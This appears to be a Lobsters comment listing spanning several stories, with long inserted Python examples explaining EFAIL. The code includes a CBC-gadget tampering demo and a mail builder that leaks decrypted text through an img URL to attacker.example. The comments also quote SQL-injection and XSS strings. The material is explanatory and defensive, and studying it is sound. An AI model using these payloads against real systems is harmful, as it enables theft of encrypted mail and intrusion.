1. 12

    great idea and execution! especially for the mono-toned images! I love it.

    however, maybe you should disable the scroll effect on article content and make the page background more paper-like :D

    Do you plan to open source it?

    1. 6

      thanks! the scroll effect is one of the tools i use to hide a lot of the sins of not being very good at laying out the articles. I’d like to disable it if i can but i think first i need to solve the problems mentioned here https://lobste.rs/s/ureotv/webpage_serverside_rendered_lo_fi_rss#c_3topbx, or truncate the articles to their box size in javascript, not sure which yet. If i truncate i’ll either have a modal view to the whole article, or just link directly to the source.

      as far as open sourcing it, yeah i think i will. depending on how much people like this i’ll probably add in the ability to choose your own feeds, categories, and layouts and might have a hosted version people could pay for, or an open source one you can host yourself.

      1. 4

        That’s great to hear, would love to see the source, set something like this up for myself. It looks great!

        1. 1

          Maybe use the column layout like iht.com used years ago.

          http://www.smokinggun.com/code/sg_layout.php

          1. 1

            great! keep up the good work. i’m looking forward to a hosted version, i’ll definitely pay for it!

            1. 1

              Very cool!

              I wonder if CSS grid can help with the layout. It seems like you would want to place articles into columns left-to-right like this: https://jsfiddle.net/4w8ysrqo/1/

              The part I can’t figure out is how to automatically set the height in grid cells based on the height in pixels.

          1. 1

            Does anyone have a list of the benefits/drawbacks they are referring to? Is there any discussion I can refer to?

            1. 7

              today’s date is the primary reference

              1. 1

                oh, hahaha I feel dumb now

              2. 1

                Check the date…

                1. 7

                  So as far as I see, this isn’t necessarily a bug with PGP “itself”, when used for signing git commits or used in combination with pass, but rather when sending encrypted emails. Or am I wrong?

                  1. 2

                    The first exploit is definitely not PGP’s fault.

                    Unfortunately because I don’t know S/MIME, I can’t comment. But it seems like there is some inherent problem with the second attack affecting both it and PGP.

                    1. 2

                      CBC and CFB encryption modes use the previous blocks when encrypting new blocks. There are some weaknesses, and of course OpenPGP and S/MIME use them. That seems to be part of the problem. The other part is that stitching together multipart messages is something that email clients have no problem with doing, so shit HTML can result in a query string that exfiltrates the content of the decrypted parts.

                      1. 2

                        OpenPGP mitigates those weaknesses with authenticated encryption (MDC). So it’s still only a problem if a broken MUA ignores decryption errors from gpg (or if the email in question is using a very old cipher. so, the attack may work if you auto-load remote content on encrypted emails from before 2000)
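
An added example, not code from the thread, from GnuPG or from the EFAIL authors, of the two points made in the last two comments: the "CBC gadget" by which an attacker who knows one plaintext block rewrites it without the key, and the MDC check that makes a correct client reject the tampered message. The block cipher is a constructed 4-round Feistel toy on HMAC-SHA256 standing in for AES (the attack depends only on the mode of operation), the MDC is a simplified plaintext-hash trailer, and the secret message is made up.

```python
"""Added example (not from the thread, GnuPG or the EFAIL paper): the 'CBC
gadget' lets an attacker who knows one plaintext block rewrite it without the
key; an integrity check such as OpenPGP's MDC makes a correct client reject
the result.  The block cipher is a constructed 4-round Feistel toy built on
HMAC-SHA256, standing in for AES: the attack depends on the mode, not the cipher."""
import hashlib
import hmac
import os

BLOCK = 16
MDC_LEN = 20  # SHA-1 digest length, as in OpenPGP's MDC packet


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, rnd, half):
    return hmac.new(key, bytes([rnd]) + half, hashlib.sha256).digest()[:8]

def enc_block(key, block):
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _round(key, rnd, right))
    return left + right

def dec_block(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _round(key, rnd, left)), left
    return left + right

def _pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def _unpad(data):
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, padded):
    out, prev = [], iv
    for i in range(0, len(padded), BLOCK):
        prev = enc_block(key, _xor(padded[i:i + BLOCK], prev))
        out.append(prev)
    return iv + b"".join(out)  # block 0 of the ciphertext is the IV

def cbc_decrypt(key, data):
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    return b"".join(_xor(dec_block(key, c), p) for p, c in zip(blocks, blocks[1:]))

def seal(key, iv, plaintext):
    """Encrypt plaintext || SHA-1(plaintext): a simplified MDC (the real packet
    also covers a random prefix and a 0xD3 0x14 trailer, same principle)."""
    return cbc_encrypt(key, iv, _pad(plaintext + hashlib.sha1(plaintext).digest()))

def open_unchecked(key, data):
    """What a broken MUA effectively does: decrypt and render, MDC result ignored."""
    return _unpad(cbc_decrypt(key, data))[:-MDC_LEN]

def open_checked(key, data):
    """What gpg does: refuse to return plaintext whose MDC does not verify."""
    padded = _unpad(cbc_decrypt(key, data))
    body, mdc = padded[:-MDC_LEN], padded[-MDC_LEN:]
    if not hmac.compare_digest(hashlib.sha1(body).digest(), mdc):
        raise ValueError("MDC failure: message was modified")
    return body

def cbc_gadget(data, idx, known, chosen):
    """Make plaintext block idx (>= 1) decrypt to `chosen` instead of `known`.
    P[i] = D(C[i]) ^ C[i-1], so XORing known^chosen into C[idx-1] lands exactly
    in P[idx]; for idx > 1, P[idx-1] becomes garbage (in CFB the garbage lands
    in the block after the controlled one instead).  No key needed."""
    blocks = [data[i:i + BLOCK] for i in range(0, len(data), BLOCK)]
    blocks[idx - 1] = _xor(blocks[idx - 1], _xor(known, chosen))
    return b"".join(blocks)

def demo():
    key, iv = os.urandom(32), os.urandom(BLOCK)
    secret = b"Content-type: text/plain\r\n\r\nThe launch code is 4 8 15 16 23 42.\r\n"
    message = seal(key, iv, secret)
    # Known first block (a MIME header, as in S/MIME) swapped for an <img> opener;
    # the untouched remainder would end up inside the image URL when rendered.
    tampered = cbc_gadget(message, 1, secret[:BLOCK], b'<img src="http:/')
    rendered = open_unchecked(key, tampered)
    try:
        open_checked(key, tampered)
        rejected = False
    except ValueError:
        rejected = True
    return secret, rendered, rejected, open_checked(key, message)
```

Block 1 is rewritten through the IV, so no block is lost; injecting later in the message costs one garbage block per injected block, which is why the real gadget chains several injections. The tampered ciphertext decrypts fine for a client that ignores the integrity result and fails only in `open_checked`, which is the "broken MUA ignores decryption errors" condition from the comment above.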


                  1. 3

                    A group of European security researchers have released a warning about a set of vulnerabilities affecting users of PGP and S/MIME. […]

                    The full details will be published in a paper on Tuesday at 07:00 AM UTC (3:00 AM Eastern, midnight Pacific). In order to reduce the short-term risk, we and the researchers have agreed to warn the wider PGP user community in advance of its full publication.

                    Our advice, which mirrors that of the researchers, is to immediately disable and/or uninstall tools that automatically decrypt PGP-encrypted email.

                    Answers to some obvious questions are provided by one of the researchers in this Twitter thread

                    1. 12

                      They figured out mail clients which don’t properly check for decryption errors and also follow links in HTML mails. So the vulnerability is in the mail clients and not in the protocols. In fact OpenPGP is immune if used correctly while S/MIME has no deployed mitigation.

                      From GNU Privacy Guard on Twitter

                      Due to broken MIME parsers a bunch of MUAs seem to concatenate decrypted HTML mime parts which makes it easy to plant such HTML snippets.

                      There are two ways to mitigate this attack

                      • Don’t use HTML mails. Or if you really need to read them use a proper MIME parser and disallow any access to external links.

                      • Use authenticated encryption.

                      From Werner Koch
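
An added example, not code from the thread, GnuPG or the EFAIL authors, of the crypto-free attack Werner Koch's note describes: a MUA whose MIME parser concatenates decrypted HTML parts lets the attacker wrap a captured ciphertext in a half-open `<img>` tag. Encryption is replaced by a base64 placeholder (the trick never touches the cipher), the addresses, hostnames and secret are constructed, and both "clients" are toy renderers that only collect the image URLs they would fetch.

```python
"""Added example (not from the thread or the EFAIL paper): the 'direct
exfiltration' channel against a MUA that concatenates decrypted MIME parts.
Encryption is a base64 placeholder because this trick never touches the
crypto; only the client's rendering matters.  Addresses are constructed."""
import base64
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser

ATTACKER = "http://attacker.example/collect?d="
SECRET = "The launch code is 4 8 15 16 23 42."  # constructed victim plaintext


def fake_encrypt(plaintext):
    """Stand-in for PGP/S-MIME encryption (assumption: attack is cipher-agnostic)."""
    return base64.b64encode(plaintext.encode())

def fake_decrypt(blob):
    return base64.b64decode(blob).decode()

def build_attack_mail(captured_ciphertext):
    """Attacker re-sends stolen ciphertext sandwiched between two HTML fragments so
    that, once decrypted and concatenated, the plaintext sits inside an <img src>."""
    msg = EmailMessage()
    msg["From"] = "attacker@attacker.example"
    msg["To"] = "victim@example.org"
    msg["Subject"] = "Re: your last mail"
    msg.make_mixed()
    head, enc, tail = EmailMessage(), EmailMessage(), EmailMessage()
    head.set_content(f'<img src="{ATTACKER}', subtype="html")   # opens the tag
    enc.set_content(captured_ciphertext, maintype="application",
                    subtype="pkcs7-mime")                      # the victim's old mail
    tail.set_content('">', subtype="html")                     # closes the tag
    for part in (head, enc, tail):
        msg.attach(part)
    return msg.as_bytes()

class ImgCollector(HTMLParser):
    """Records every <img src=...> the rendering engine would fetch."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.urls += [v for k, v in attrs if k == "src" and v]

def decrypt_part(part):
    if part.get_content_type() == "application/pkcs7-mime":
        return fake_decrypt(part.get_content())
    return part.get_content()

def image_loads(html_doc):
    p = ImgCollector()
    p.feed(html_doc)
    p.close()
    return p.urls

def broken_mua(raw):
    """Decrypts every part, concatenates the results into ONE HTML document and
    auto-loads remote images: the plaintext leaves in the request URL."""
    msg = message_from_bytes(raw, policy=policy.default)
    return image_loads("".join(decrypt_part(p) for p in msg.iter_parts()))

def careful_mua(raw):
    """Renders each MIME part as its own document (a proper MIME parser): the
    attacker's half-open tag and the plaintext never meet, so nothing leaks.
    A real client would additionally refuse remote loads for encrypted mail."""
    msg = message_from_bytes(raw, policy=policy.default)
    urls = []
    for part in msg.iter_parts():
        urls += image_loads(decrypt_part(part))
    return urls
```

`broken_mua` returns a single URL that starts with the attacker's collector and carries the whole decrypted text as its query string (a browser engine would percent-encode the spaces and newlines before sending it); `careful_mua` returns nothing, because a lone `<img src="...` with no closing quote is not a tag and the decrypted part contains no HTML at all. Either of Koch's mitigations, a per-part parser or no remote loads, is enough to break this channel.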

                      1. 4

                        Also: Don’t make mistakes. That’s important.

                        1. 4

                          HTML e-mail and PGP always seemed mutually exclusive to me :-)

                          1. 2

                            Don’t use HTML mails. Or if you really need to read them use a proper MIME parser and disallow any access to external links.

                            Appreciate the highlights. My friends and I just GPG-encrypt text or zip files that we mail to each other to avoid problems in email clients. Looks like we’ll be fine. :)

                        1. 3

                          “Therefore, we propose to remove [EV] indicators, effective immediately,”

                          Dutch bank https://www.ing.nl using a Symantec cert already lost the EV mark in Google Chrome while Chromium/Firefox display the EV mark.

                          1. 3

                            Seems they switched to a new CA already today (Entrust).

                          1. 7

                            I’m curious about the “various factors” - maybe the super tiny margins in the hardware market?

                            1. 4

                              “C. River Ventures killed Pebble but made a decent return: a $40m return on its $15m investment”

                              http://www.theregister.co.uk/2016/12/08/the_vulture_capitalists_killed_pebble/?page=2

                              1. 1

                                That’s really fantastic news. As sad as I am to see the company go away, the folks who created Pebble took a HUGE risk. They deserve a nice payout.

                            1. 7

                              I’m just in the process of switching to the ErgoDox EZ. One week in, and after a sweary first few days, I’m mostly typing without thinking about typing again. Very happy with the keyboard so far. Looking forward to customising the layout.

                              This switch makes my history of ergonomic keyboards:

                              1. 2

                                I’m still on the Microsoft keyboard line and very happy with the Sculpt Ergonomic. The compact design is a big improvement over the Ergo Keyboard 4000. Pricing of the Microsoft line of keyboards is roughly a third compared to the ErgoDox EZ, but price may not be your first priority.

                                1. 2

                                  The upgrade was very much a treat. I was on the 4000 for 5 years (though I had 2 in that time due to wear), and the Sculpt for a bit over 2. I had a £100 gift to put towards something, and thought I’d treat myself.

                                  Aside from the lack of mechanical keys the Microsoft keyboards are awesome!

                                2. 2

                                  Hah, my order actually looks similar, except switch the ErgoDox EZ with the Sculpt. I went from the 4000 to ErgoDox EZ, but realized the ErgoDox is much too large for my hands, and I really wasn’t having a remotely good experience typing on it. So back to the Sculpt I go.

                                1. 2

                                  This reminds me of an old (and basically defunct) project called coLinux (specifically, its andLinux variant). I really liked it when it was around, left me with a nice system for games, and all the Linux I needed for programming. Good to see something like it coming around again.

                                  1. 1

                                    Apple had to do something similar to port OS9 applications to OSX (both having a completely different architecture and, I think, binary format).

                                    1. 1

                                      It reminds me of MachTen, of which I was an enthusiastic proponent, back when MacOS didn’t mean NextStep.

                                      1. 1

                                        MachTen

                                        I remember MachTen! I really wanted to try it out, but could never convince my dad to pony up for it…

                                        Instead, when I went off to college, he let me take an old Sun 3/60 with me (along with my mac), which was at the time simultaneously cooler and less useful than MachTen would’ve been.

                                        Did you use MachTen for work?

                                        1. 1

                                          Did you use MachTen for work?

                                          Yeah, although more for Emacs and telnet (!) than anything else. On my big old Powermac 8600.

                                      2. 1

                                        The three options I see are 1. Enhanced Cygwin-like API (it’s still win32, and as such, needs recompile) 2. Linux subsystem for NT (should be transparent - FreeBSD takes this approach) 3. Invisible Ubuntu VM running inside of Hyper-V (apparently discounted)

                                        1. 7

                                          http://blog.dustinkirkland.com/2016/03/ubuntu-on-windows.html has some more insights, confirming zaphar’s reply

                                          1. 5

                                            It’s essentially Wine in reverse. All the linux syscalls have been ported and native ubuntu apps run unmodified. So it’s pretty much 2.

                                            1. 8

                                              Can’t wait for someone to install Wine on Ubuntu on Windows 10, and then Cygwin on Wine. And since it seems possible to do this the other way round, we could finally run Cygwin on Wine on Cygwin on Wine on Ubuntu on Windows. (Bonus point for doing this on Windows on a Mac.)

                                              1. 3

                                                It’s essentially Wine in reverse.

                                                This makes it sound hacky ;). Windows NT has/had support for multiple of what they call ‘personalities’. As far as I understand, from the perspective of the NT kernel Win32 is just another personality. There used to be OS/2 and POSIX personalities as well.

                                                https://www.microsoft.com/resources/documentation/windowsnt/4/workstation/reskit/en-us/os2comp.mspx?mfr=true https://www.youtube.com/watch?v=C0oWo9kV9K4

                                                I guess that the new Linux support is implemented as an NT personality.

                                                Does anyone know how they handle fork()? One of the problems for Cygwin was that fork() couldn’t be neatly mapped to a Win32 call, so they basically had to implement non-COW fork(), which is less efficient:

                                                https://www.cygwin.com/faq.html#faq.api.fork

                                                1. 6

                                                  NT itself has had a native COW fork() implementation going back a long time, but it’s not exposed via the Win32 API. You can reach it directly via the Native API NtCreateProcess function (exposed in ntdll.dll) with the right parameters. The problem here though is by going through the Native API there’s a large chunk of process initialisation that is implemented in Win32 that won’t be performed. As I understand it, this makes any such process created by such a method effectively “incompatible” with other Win32 processes on the system. You can find some interesting discussion on this here.

                                                  So to circle back to your question, if they’re implementing it via a separate environment subsystem, which it appears they are, they can presumably just use the native NT fork() support, but then there’s a greater question of compatibility with Win32 processes and how NT “Linux” processes can communicate with Win32 processes (and vice versa). Alternatively, I guess they could expose the fork() call via Win32, but this would imply they’re using Win32 processes as well…

                                                  I really need to load up the Windows 10 preview with this so I can actually get some concrete answers!

                                                  EDIT: One interesting addendum is that per this Ars Technica article there’s definitely several new kernel components involved, in the form of at least two drivers: lxcore.sys and lxss.sys. So there’s clearly more going on than just a separate Linux environment that’s implemented on top of the existing Native API exposed in ntdll.dll. What exactly those provide I’m not sure, but it’s worth noting as best I can remember Interix/SFU/SUA never required any kernel support as they just implemented a separate subsystem on top of what was already exposed in the Native API.

                                                  1. 2

                                                    If they want to handle Linux system calls in unmodified binaries, there will definitely have to be at least a small kernel component. Linux binaries make use of the syscall instruction on amd64 and the int 0x80 instruction on i386. If nothing else, they will need to trap those instructions separately from whatever regular Windows processes are doing.

                                                    1. 1

                                                      ss stands for “subsystem” in NT component names (e.g. lsass.exe for the Local Security Authority, or csrss.exe for the Client Server Runtime, aka Win32 subsystem support) so lxss.sys would not be an unexpected name for the Linux subsystem kernel component.

                                            1. 6

                                              More interesting contributors:

                                              “Mihai'); DROP TABLE Donors;-- ”

                                              little bobby tables shows up everywhere

                                              1. 3

                                                █▄▄ ███ █▄▄ █▄█▄█ █▄█ ▀█▀

                                                (づ。◕‿‿◕。)づ ☜(゚ヮ゚☜) ლ(.◉◞౪◟◉‵ლ) ヽ༼ຈل͜ຈ༽ノ [̲̅.̲̅(̲̅ ͡° ͜ʖ ͡°̲̅)̲̅.̲̅] Ƹ̵̡Ӝ̵̨̄Ʒ

                                                <script type='text/javascript'>alert("cczub gave you money and checked for XSS for free");</script>

                                                humanity never ceases to amaze me

                                            1. 2

                                              what happened to OpenCVS?

                                              1. 5

                                                The interested developers left and the left developers aren’t interested, basically. I think it got really close, but it’s not fully compatible and achieving that last bit requires a rather massive overhaul. As in, there may not be a way to finish it with a series of only small patches.

                                              1. 4

                                                So just to be sure I understand what a “planet” is - it’s a blogroll/aggregate feed of the project’s members and participants?

                                                1. 3

                                                  From http://www.planetplanet.org/

                                                  Planet is an awesome ‘river of news’ feed reader. It downloads news feeds published by web sites and aggregates their content together into a single combined feed, latest news first.

                                                  Your understanding is correct
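
As an added illustration of the "river of news" definition quoted above (this is not Planet's own code), a minimal aggregator: parse each member's RSS feed, merge the items, newest first. Both feeds are constructed inline; a real planet fetches them over HTTP on a schedule and, since they are untrusted input, should parse them with a hardened XML parser.

```python
"""Added example of what a planet does with the feeds it pulls: parse each
RSS document, merge the items, newest first.  Both feeds are constructed
inline; a real planet fetches them over HTTP on a schedule."""
import xml.etree.ElementTree as ET
from email.utils import parsedate_to_datetime

# Constructed sample feeds (RSS 2.0 carries RFC 822 dates in <pubDate>).
FEEDS = {
    "alice": """<rss version="2.0"><channel><title>Alice's blog</title>
      <item><title>Post A1</title><link>http://alice.example/a1</link>
            <pubDate>Mon, 02 Jun 2014 10:00:00 +0000</pubDate></item>
      <item><title>Post A2</title><link>http://alice.example/a2</link>
            <pubDate>Wed, 04 Jun 2014 09:30:00 +0000</pubDate></item>
    </channel></rss>""",
    "bob": """<rss version="2.0"><channel><title>Bob's blog</title>
      <item><title>Post B1</title><link>http://bob.example/b1</link>
            <pubDate>Tue, 03 Jun 2014 18:15:00 -0400</pubDate></item>
    </channel></rss>""",
}


def parse_rss(feed_name, xml_text):
    # Feeds are untrusted input; on real data use defusedxml rather than the
    # stdlib parser (assumption: the toy feeds above are benign).
    root = ET.fromstring(xml_text)
    for item in root.iter("item"):
        yield {
            "feed": feed_name,
            "title": item.findtext("title"),
            "link": item.findtext("link"),
            "date": parsedate_to_datetime(item.findtext("pubDate")),
        }


def river(feeds, limit=None):
    """Merge every feed's items into one timeline, latest first."""
    entries = [e for name, xml in feeds.items() for e in parse_rss(name, xml)]
    entries.sort(key=lambda e: e["date"], reverse=True)
    return entries[:limit] if limit else entries
```

Time zones are kept on the parsed dates so that Bob's -0400 post sorts correctly between Alice's two UTC posts.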

                                                1. 1

                                                  A fresh start - full disclosure returns http://seclists.org/fulldisclosure/2014/Mar/333

                                                  1. 1

                                                    If exploited, this vulnerability might permit code execution with the privileges of the authenticated user

                                                    phew

                                                    1. 2

                                                      .. and may therefore allow bypassing restricted shell/command